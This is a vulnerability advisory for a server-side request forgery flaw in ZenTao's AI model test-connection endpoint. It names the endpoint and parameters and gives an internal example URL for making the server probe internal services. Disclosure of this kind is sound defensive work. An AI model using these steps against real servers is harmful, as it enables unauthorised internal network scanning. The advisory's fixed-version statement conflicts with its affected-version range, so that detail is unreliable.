ZenTao Server-Side Request Forgery Vulnerability in AI Model Test Connection

A server-side request forgery (SSRF) vulnerability has been identified in ZenTao versions up to 21.7.6-8564. The issue arises in the 'makeRequest' function of 'module/ai/model.php', where the 'base' parameter is not properly validated, allowing attackers to manipulate it and have the server send requests to internal resources. This could lead to internal network discovery and port scanning, as different services respond with varying error messages and response times, indicating open ports and service types. The vulnerability can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows for internal port scanning and service discovery. Attackers can identify open ports and services, determine service types based on response differences, and probe for unauthorized access or vulnerable services within the internal network.

Reproduction

To reproduce this vulnerability, send a POST request to '/zentao/ai-modelTestConnection.html' with the 'vendor' parameter set to 'openaiCompatible' and the 'base' parameter containing a URL pointing to an internal resource, such as 'http://127.0.0.1:8000/admin'. The request can be made using a tool like curl or Postman, ensuring that the 'Content-Type' is set to 'multipart/form-data'.

Remediation

Users are advised to upgrade to ZenTao version 21.7.6, which addresses this vulnerability. The patch is available for download from the ZenTao website.